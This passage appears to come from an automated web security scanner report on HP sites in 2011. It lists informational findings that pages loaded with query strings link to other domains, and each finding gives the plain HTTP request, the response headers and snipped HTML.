src="http://hplc-prod.s3.amazonaws.com/media/50481/all_in_one_64.jpg?v=1288625342000"
/>


</a>
...[SNIP]...
<!-- BEGIN KEYLIME + OMNITURE METRICS JAVASCRIPT -->
<script type="text/javascript"
src="http://welcome.hp-ww.com/country/us/eng/js/metricsNAUSmktg.js">
</script>
...[SNIP]...

17.46. http://h30187.www3.hp.com/howto_QL_courses.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /howto_QL_courses.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /howto_QL_courses.jsp?contentType=How-to+in+2&mcid=explore-create HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:31:22 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:45:29 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 125944
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
Learning center
...[SNIP]...
</script>

<link href="http://welcome.hp-ww.com/country/us/en/styles/hpweb_styles_mac.css"
type="text/css" rel="stylesheet">

<link href="http://welcome.hp-ww.com/country/us/en/styles/hpweb_eeeep_ov2.css"
type="text/css" rel="stylesheet">

<script type="text/javascript" language="JavaScript"
src="http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js">
</script>
<script type="text/javascript" language="JavaScript"
src="http://welcome.hp-ww.com/js/hpweb_soctag.js">
</script>
...[SNIP]...
<a href="http://welcome.hp.com/country/us/en/welcome.html" onmousedown="return Powered.WebAnalytics.recordClick(this, '');" title="HP.com home"><img
src="http://welcome.hp-ww.com/img/hpweb_1-2_topnav_hp_logo.gif"
width="64" height="55" alt=""
border="0">
<span class="screenReading">
...[SNIP]...
&BEID=19701&SBLID=&jumpid=in_r2910_VRbundles/psgpromo/subs/heasmith" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=700&eventType=PDC&productId=104916');" target="_blank">
<img src="http://hplc-prod.s3.amazonaws.com/media/50471/virtualRooms_v2_148.jpg?v=1287408819000" border="0" alt="HP Virtual Rooms" />
</a>
...[SNIP]...
<a href="/tutorials/viewHowTo/p/courseId/40443/Microsoft_PowerPoint.htm?campusId=700" ><img src="http://hplc-prod.s3.amazonaws.com/media/50600/Microsoft_PowerPoint_2010_create_a_new_slide_master_180x110_play.jpg?v=1291754008000" border="0" alt="Microsoft.. PowerPoint 2010: create a new slide master "/></a>
...[SNIP]...
tegory=photosmart_printers&jumpid=re_r602_oc_home_prod_ipg_oct10_photoprinters" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=700&eventType=PDC&productId=104917');">
<img
width="64"
height="64"
border="0"
alt="Photo Printer"
src="http://hplc-prod.s3.amazonaws.com/media/50480/photo_printer_64.jpg?v=1288625342000"
/>


</a>
...[SNIP]...
template_type=printer_supp_acc&jumpid=re_r602_oc_home_prod_ipg_oct10_inkpaper " onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=700&eventType=PDC&productId=104919');">
<img
width="64"
height="64"
border="0"
alt="Ink and Paper"
src="http://hplc-prod.s3.amazonaws.com/media/50482/ink_64.jpg?v=1288625342000"
/>


</a>
...[SNIP]...
ps&a1=Category&v1=TouchSmart+PCs&jumpid=re_R602_home_prod_ipg_oct10_touchsmart" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=700&eventType=PDC&productId=104931');">
<img
width="64"
height="64"
border="0"
alt="TouchSmart PCs"
src="http://hplc-prod.s3.amazonaws.com/media/50581/TS_600t_64.jpg?v=1289247165000"
/>


</a>
...[SNIP]...
te_type=landing&landing=scanner&jumpid=re_r602_oc_home_prod_ipg_oct10_scanners" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=700&eventType=PDC&productId=104922');">
<img
width="64"
height="64"
border="0"
alt="Scanners"
src="http://hplc-prod.s3.amazonaws.com/media/50485/BN_scanners_64.jpg?v=1288625341000"
/>


</a>
...[SNIP]...
mputer_store&landing=notebooks&jumpid=re_r602_oc_home_prod_psg_oct10_notebooks" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=700&eventType=PDC&productId=104921');">
<img
width="64"
height="64"
border="0"
alt="Notebooks"
src="http://hplc-prod.s3.amazonaws.com/media/50484/notebooks_64.jpg?v=1288625341000"
/>


</a>
...[SNIP]...
atLevel=1&storeName=storefronts&jumpid=re_r602_oc_home_prod_ipg_oct10_allinone" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=700&eventType=PDC&productId=104918');">
<img
width="64"
height="64"
border="0"
alt="All in One"
src="http://hplc-prod.s3.amazonaws.com/media/50481/all_in_one_64.jpg?v=1288625342000"
/>


</a>
...[SNIP]...
<!-- BEGIN KEYLIME + OMNITURE METRICS JAVASCRIPT -->
<script type="text/javascript"
src="http://welcome.hp-ww.com/country/us/eng/js/metricsNAUSmktg.js">
</script>
...[SNIP]...

17.47. http://h30187.www3.hp.com/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /index.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.jsp?tab=atWork&mcid=explore-create HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:31:18 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:45:24 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 61817
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
Learning center
...[SNIP]...
</script>

<link href="http://welcome.hp-ww.com/country/us/en/styles/hpweb_styles_mac.css"
type="text/css" rel="stylesheet">

<link href="http://welcome.hp-ww.com/country/us/en/styles/hpweb_eeeep_ov2.css"
type="text/css" rel="stylesheet">

<script type="text/javascript" language="JavaScript"
src="http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js">
</script>
<script type="text/javascript" language="JavaScript"
src="http://welcome.hp-ww.com/js/hpweb_soctag.js">
</script>
...[SNIP]...
<a href="http://welcome.hp.com/country/us/en/welcome.html" onmousedown="return Powered.WebAnalytics.recordClick(this, '');" title="HP.com home"><img
src="http://welcome.hp-ww.com/img/hpweb_1-2_topnav_hp_logo.gif"
width="64" height="55" alt=""
border="0">
<span class="screenReading">
...[SNIP]...
&BEID=19701&SBLID=&jumpid=in_r2910_VRbundles/psgpromo/subs/heasmith" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=700&eventType=PDC&productId=104916');" target="_blank">
<img src="http://hplc-prod.s3.amazonaws.com/media/50471/virtualRooms_v2_148.jpg?v=1287408819000" border="0" alt="HP Virtual Rooms" />
</a>
...[SNIP]...
<a href="/courses/overview/p/courseId/39948/Shooting_great_small_business_videos.htm?campusId=11220" ><img src="http://hplc-prod.s3.amazonaws.com/media/50439/Shooting_great_small_business_videos_180x110.jpg?v=1286816935000" border="0" alt="Shooting great small business videos"/></a>
...[SNIP]...
<a href="/campus/p/campusId/11260/Business_basics.htm" ><img src="http://hplc-prod.s3.amazonaws.com/media/46053/business-basics.jpg?v=1281723268000" alt="Business basics"/></a>
...[SNIP]...
<a href="/campus/p/campusId/10163/IT_professionals.htm" ><img src="http://hplc-prod.s3.amazonaws.com/media/18533/it_camp.jpg?v=1281716318000" alt="IT professionals"/></a>
...[SNIP]...
<a href="/campus/p/campusId/10480/Microsoft_Office_and_Adobe.htm" ><img src="http://hplc-prod.s3.amazonaws.com/media/38707/msoffice_adobe.jpg?v=1281721869000" alt="Microsoft Office and Adobe"/></a>
...[SNIP]...
<a href="/campus/p/campusId/11240/PC_security_and_maintenance_.htm" ><img src="http://hplc-prod.s3.amazonaws.com/media/46052/pc-security-work.jpg?v=1281723268000" alt="PC security and maintenance "/></a>
...[SNIP]...
</span>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="220" height="12" id="polling" align="top">
<param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
</span>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="220" height="12" id="polling" align="top">
<param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
</span>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="220" height="12" id="polling" align="top">
<param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
</span>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="220" height="12" id="polling" align="top">
<param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
</span>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="220" height="12" id="polling" align="top">
<param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
</span>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="220" height="12" id="polling" align="top">
<param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
mputer_store&landing=notebooks&jumpid=re_r602_oc_home_prod_psg_oct10_notebooks" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=700&eventType=PDC&productId=104921');">
<img
width="64"
height="64"
border="0"
alt="Notebooks"
src="http://hplc-prod.s3.amazonaws.com/media/50484/notebooks_64.jpg?v=1288625341000"
/>


</a>
...[SNIP]...
atLevel=1&storeName=storefronts&jumpid=re_r602_oc_home_prod_ipg_oct10_allinone" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=700&eventType=PDC&productId=104918');">
<img
width="64"
height="64"
border="0"
alt="All in One"
src="http://hplc-prod.s3.amazonaws.com/media/50481/all_in_one_64.jpg?v=1288625342000"
/>


</a>
...[SNIP]...
pping/accessories_landing.do?jumpid=re_r602_oc_home_prod_ipg_oct10_accessories" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=700&eventType=PDC&productId=104923');">
<img
width="64"
height="64"
border="0"
alt="Accessories"
src="http://hplc-prod.s3.amazonaws.com/media/50487/BN-mouse_key_usb_64.jpg?v=1288625342000"
/>


</a>
...[SNIP]...
ps&a1=Category&v1=TouchSmart+PCs&jumpid=re_R602_home_prod_ipg_oct10_touchsmart" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=700&eventType=PDC&productId=104931');">
<img
width="64"
height="64"
border="0"
alt="TouchSmart PCs"
src="http://hplc-prod.s3.amazonaws.com/media/50581/TS_600t_64.jpg?v=1289247165000"
/>


</a>
...[SNIP]...
/cache/309717-0-0-225-121.html?jumpid=re_r602_oc_home_prod_ipg_oct10_totalcare" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=700&eventType=PDC&productId=104924');">
<img
width="64"
height="64"
border="0"
alt="Extended Service Plan"
src="http://hplc-prod.s3.amazonaws.com/media/50488/Total_care_64.jpg?v=1288625342000"
/>


</a>
...[SNIP]...
omputer_store&landing=desktops&jumpid=re_r602_oc_home_prod_psg_oct10_desktops " onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=700&eventType=PDC&productId=104920');">
<img
width="64"
height="64"
border="0"
alt="Desktops"
src="http://hplc-prod.s3.amazonaws.com/media/50483/desktops_64.jpg?v=1288625342000"
/>


</a>
...[SNIP]...
<!-- BEGIN KEYLIME + OMNITURE METRICS JAVASCRIPT -->
<script type="text/javascript"
src="http://welcome.hp-ww.com/country/us/eng/js/metricsNAUSmktg.js">
</script>
...[SNIP]...

17.48. http://h30261.www3.hp.com/phoenix.zhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30261.www3.hp.com
Path:   /phoenix.zhtml

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /phoenix.zhtml?c=71087&p=irol-irhome HTTP/1.1
Host: h30261.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=52
Date: Sun, 04 Sep 2011 16:32:32 GMT
Content-Length: 44498
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head><title>HP Investor Relations - HP Investor relations overview</title><met
...[SNIP]...
ta name="Description" content="Hewlett-Packard financial information including information about the Compaq merger, quarterly results, annual reports, press releases, stock quotes, and SEC filings." /><script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://media.corporate-ir.net/media_files/irol/global_js/phoenix.js"></script>
...[SNIP]...
</script><link href="http://media.corporate-ir.net/media_files/irol/71/71087/facebox/facebox.css" media="screen" rel="stylesheet" type="text/css" /><script src="http://media.corporate-ir.net/media_files/irol/71/71087/facebox/facebox.js" type="text/javascript"></script>
...[SNIP]...
</script><script src="http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2" type="text/javascript"></script>
...[SNIP]...
<a href="#jumptocontent"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt="Jump to content" border="0" /></a>
...[SNIP]...
<td><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="24" alt="" border="0" /></td>
...[SNIP]...
<td><img src="http://welcome.hp-ww.com/img/s.gif" width="20" height="1" alt="" /></td>
...[SNIP]...
<a href="http://welcome.hp.com/country/us/en/welcome.html"><img src="http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_home.gif" width="100" height="24" border="0" alt="HP.com Home" /></a></td><td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt="" /></td><td><a href="http://welcome.hp.com/country/us/en/prodserv.html"><img src="http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_prdsrv.gif" width="166" height="24" border="0" alt="Products and Services" /></a></td><td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt="" /></td><td><a href="http://welcome.hp.com/country/us/en/support.html"><img src="http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_supprt.gif" width="163" height="24" border="0" alt="Support and Drivers" /></a></td><td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt="" /></td><td><a href="http://welcome.hp.com/country/us/en/solutions.html"><img src="http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_slutns.gif" width="143" height="24" border="0" alt="Solutions" /></a></td><td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt="" /></td><td><a href="http://welcome.hp.com/country/us/en/howtobuy.html"><img src="http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_buy.gif" width="143" height="24" border="0" alt="How to Buy" /></a></td><td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt="" /></td>
...[SNIP]...
<td width="20" valign="top"><img src="http://welcome.hp-ww.com/img/s.gif" width="20" height="48" alt="" class="decoration" /></td>
...[SNIP]...
<td colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="2" alt="" border="0" /></td>
...[SNIP]...
<td valign="top"><img src="http://welcome.hp-ww.com/img/s.gif" width="4" height="1" alt="" class="decoration" /></td>
...[SNIP]...
<input type="text" name="qt" size="26" maxlength="1991" /><img src="http://welcome.hp-ww.com/img/s.gif" width="8" height="1" alt="" /><a id="country" onMouseOver="status='search using the specified criteria';return true;" onMouseOut="status='';return true;" onFocus="status='search using the specified criteria';return true;" onBlur="s
...[SNIP]...
<td align="left"><img src="http://welcome.hp-ww.com/img/s.gif" width="20" height="1" alt="" class="decoration" /></td>
...[SNIP]...
<a href="http://welcome.hp.com/country/us/en/welcome.html"><img src="http://welcome.hp-ww.com/img/hpweb_1-2_topnav_hp_logo.gif" width="64" height="55" alt="HP.com home" border="0" /></a><br /></td><td width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="93" alt="" /></td>
...[SNIP]...
<br /><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="15" alt="" /><h1>
...[SNIP]...
<a name="jumptocontent"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt="Content starts here" /></a>
...[SNIP]...
</div><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="10" alt="" class="spacer-hr" /><table width="100%" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td width="16%" valign="top"><img src="http://media.corporate-ir.net/media_files/IROL/71/71087/apotheker_tcm_245_790945.jpg" border="none" hspace="5" /></td>
...[SNIP]...
</div><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="15" alt="" class="" /></td><td valign="top" width="10"><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="10" height="1" /></td>
...[SNIP]...
<td valign="top" width="100%"><img src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" border="0" valign="center" alt="Financial Overview PDF" /> .... <a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MTA0NDQ2fENoaWxkSUQ9LTF8VHlwZT0z&amp;t=1" target="_blank">Financial Overview</a><br /><img src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/HTML_small.gif" border="0" valign="center" alt="Press Release" /> .... <a href="http://h30261.www3.hp.com/phoenix.zhtml?c=71087&amp;p=irol-newsArticle&amp;ID=1598003&amp;highlight=' target=">
...[SNIP]...
<br /><img src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_win.gif" border="0" valign="center" alt="Audio Webcast" /> .... <a href="http://h30261.www3.hp.com/phoenix.zhtml?c=71087&amp;p=irol-EventDetails&amp;EventId=3561763">
...[SNIP]...
<br /><img src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" border="0" valign="center" alt="Presentation" /> .... <a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MTA0NDQ1fENoaWxkSUQ9LTF8VHlwZT0z&amp;t=1" target="_blank">Presentation</a>
...[SNIP]...
<td valign="top" width="10"><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="10" height="1" /></td>
...[SNIP]...
<td valign="top" width="67%"><a href="http://media.corporate-ir.net/media_files/irol/71/71087/AR2010/HTML2/default.htm" target="_blank"><img src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/HTML_small.gif" border="0" valign="center" /></a>
....<a href="http://media.corporate-ir.net/media_files/irol/71/71087/AR2010/HTML2/default.htm" target="_blank">                2010 Annual Report</a><br /><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NzkyMjF8Q2hpbGRJRD0tMXxUeXBlPTM=&amp;t=1" target="_blank"><img src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" border="0" valign="center" /></a>
....<a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NzkyMjF8Q2hpbGRJRD0tMXxUeXBlPTM=&amp;t=1" target="_blank">                2010 Annual Report</a><br /><a href="http://media.corporate-ir.net/media_files/irol/71/71087/Proxy2011/HTML2/default.htm" target="_blank"><img src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/HTML_small.gif" border="0" valign="center" /></a>
....<a href="http://media.corporate-ir.net/media_files/irol/71/71087/Proxy2011/HTML2/default.htm" target="_blank">                2011 Proxy Statement</a><br /><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NzkyMjJ8Q2hpbGRJRD0tMXxUeXBlPTM=&amp;t=1" target="_blank"><img src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" border="0" valign="center" /></a>
....<a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NzkyMjJ8Q2hpbGRJRD0tMXxUeXBlPTM=&amp;t=1" target="_blank">                2011 Proxy Statement </a>
...[SNIP]...
ht=520,width=350,toolbar=0,status=0,menubar=0,location=0');return false;"
                           class="ccbnLnk"
                        href="ProcessCalendarRequest.asp?eventId=3561765&OverridePage=irol-eventDetails&checkJS=false"><img class="ccbnAddToCalImg" src="http://media.corporate-ir.net/media_files/irol/global_images/icon_calDwnldIT.gif" alt="Add Q4 2011 Hewlett-Packard Earnings Conference Call to Calendar" border="0"/></a> ..<a href="http://www.infotriever.com/service.asp" target="_blank"><img src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/images/icon_help_up.gif" border="0" alt="Help" /></a><noscript><img src="http://media.corporate-ir.net/media_files/irol/global_images/icon_calDwnldIT_dis.gif" title="Javascript must be enabled to use this feature." border="0" /></noscript>
...[SNIP]...
</span><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="10" alt="" class="" /><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="10" alt="" class="" /></td><td valign="top" width="10"><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="10" height="1" /></td>
...[SNIP]...
<center><a href="http://www.fastcompany.com/mic/2010/profile/hp" target="_blank"><img src="http://media.corporate-ir.net/media_files/IROL/71/71087/FastCompany.gif" border="0" /></a>
...[SNIP]...
<a href="http://www.hp.com/hpinfo/globalcitizenship/" target="_blank"><img src="http://media.corporate-ir.net/media_files/IROL/71/71087/2010HPCitizenship1.jpg" border="0" /></a>
...[SNIP]...
<a href="http://www.hp.com/hpinfo/newsroom/press/2010/100302a.html" target="_blank"><img src="http://media.corporate-ir.net/media_files/IROL/71/71087/Resposibility_img.gif" border="0" /></a>
...[SNIP]...
<br /><a href="http://www.fastcompany.com/mic/2010/profile/hp" target="_blank">learn More &gt;</a>
...[SNIP]...
<a href="http://h30431.www3.hp.com/?fr_story=053be4eba22b62707e8c71caddea8109ba8601b2&amp;rf=bm" target="_blank"><img src="http://media.corporate-ir.net/media_files/IROL/71/71087/converge.gif" border="0" /></a>
...[SNIP]...
<a href="http://h30431.www3.hp.com/?fr_story=1ab33ba0d86ce0777b4d72f618cd926de8f8de68&amp;rf=bm" target="_blank"><img src="http://media.corporate-ir.net/media_files/IROL/71/71087/StoreOnce.gif" border="0" /></a>
...[SNIP]...
<a href="http://h71028.www7.hp.com/enterprise/us/en/partners/microsoft-infrastructure-to-applications.html?jumpid=ex_r2858_us/en/large/tsg/go_microsoft_infra2apps" target="_blank"><img src="http://media.corporate-ir.net/media_files/IROL/71/71087/HPMSFTappserver.gif" border="0" /></a>
...[SNIP]...
<a href="http://www.hp.com/products1/printpermanence/index.html?jumpid=ex_R602_go/printpermanence" target="_blank"><img src="http://media.corporate-ir.net/media_files/IROL/71/71087/printperm.gif" border="0" /></a></center></td><td width="33%" align="center"><a href="http://hpbroadband.com/(S(lmaoyj34g2y0dh3pdujbrxer))/program.aspx?key=69VO03JCU5" target="_blank"><img src="http://media.corporate-ir.net/media_files/IROL/71/71087/Indigo7000(1).gif" border="0" /></a>
...[SNIP]...
<a href="http://www.hp.com/go/touchprinting" target="_blank"><img src="http://media.corporate-ir.net/media_files/IROL/71/71087/web_printer.gif" border="0" /></a>
...[SNIP]...
<br /><a href="http://hpbroadband.com/(S(lmaoyj34g2y0dh3pdujbrxer))/program.aspx?key=69VO03JCU5" target="_blank">watch the video &gt;</a>
...[SNIP]...
<td width="33%" align="center"><a href="http://www.youtube.com/palm" target="_blank"><img src="http://media.corporate-ir.net/media_files/IROL/71/71087/WebOS(2).gif" border="0" /></a>
...[SNIP]...
<br /><a href="http://www.youtube.com/palm" target="_blank">watch the video &gt;</a><br /><a href="http://www.youtube.com/palm#p/a/3156EA1DB74F3C75/0/IosKUTMXjKA" target="_blank">webOS app development &gt;</a>
...[SNIP]...
<span class="ccbnTxt"> III.. .. .. ..<a href="http://phx.corporate-ir.net/phoenix.zhtml?p=irol-eventDetails&amp;c=71087&amp;eventID=4143009" target="_blank">Converged Storage without Boundaries </a>
...[SNIP]...
<a Class="ccbnLnk"Target="_blank" href="phoenix.zhtml?c=71087&p=irol-irhome_pf"><img src="http://media.corporate-ir.net/media_files/IROL/71/71087/images/toolkit/print.png" alt="Print Page" border="0" /></a>
...[SNIP]...
R0cDovL2gzMDI2MS53d3czLmhwLmNvbS9waG9lbml4LnpodG1sP2M9NzEwODcmcD1pcm9sLWlyaG9tZQ%3d%3d" onclick="window.open(this.href,'','scrollbars=no,status=no,width=450,height=500');return false;" target="_blank"><img src="http://media.corporate-ir.net/media_files/IROL/71/71087/images/toolkit/mail.gif" alt="E-mail Page" border="0" /></a>
...[SNIP]...
<A HREF="phoenix.zhtml?c=71087&p=rssSubscription&t=&id=&" NAME=""Class="ccbnLnk"><img src="http://media.corporate-ir.net/media_files/irol/71/71087/images/toolkit/badge_rss.png" border="0" alt="RSS Feeds" /></A>
...[SNIP]...
<td valign="top"><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="10" height="1" /></td>
...[SNIP]...
<A HREF="phoenix.zhtml?c=71087&p=irol-alerts&t=&id=&" NAME=""Class="ccbnLnk"><img src="http://media.corporate-ir.net/media_files/irol/71/71087/images/toolkit/alerts.gif" border="0" alt="E-mail Alerts" /></A>
...[SNIP]...
<A HREF="phoenix.zhtml?c=71087&p=irol-contact&t=&id=&" NAME=""Class="ccbnLnk"><img src="http://media.corporate-ir.net/media_files/irol/71/71087/images/toolkit/vcard.png" border="0" alt="IR Contacts" /></A>
...[SNIP]...
<a Class="ccbnLnk"Target="_blank" href="Tearsheet.ashx?c=71087"><img src="http://media.corporate-ir.net/media_files/irol/71/71087/images/toolkit/tearsheet.gif" border="0" alt="Financial Tear Sheet" /></a>
...[SNIP]...
<td valign="top" width="10"><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="10" height="1" /></td>
...[SNIP]...
<td valign="top"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="15" alt="" class="" /></td>
...[SNIP]...
<td class="color666666bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="4" alt="" border="0" /></td>
...[SNIP]...
<td colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="4" alt="" border="0" /></td>
...[SNIP]...
<td colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="4" alt="" /></td>
...[SNIP]...
</table><script language="JavaScript" src="http://welcome.hp-ww.com/country/us/en/js/metrics_corp.js"></script>
...[SNIP]...

17.49. https://h41183.www4.hp.com/inflexion/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://h41183.www4.hp.com
Path:   /inflexion/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /inflexion/?country=US&language=US&campaigncode=inflexion&jumpid=inflexion&k_clickid=AMS|200d2a28-23e9-a048-8372-00005235d564 HTTP/1.1
Host: h41183.www4.hp.com
Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8r PHP/5.3.6
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 67697

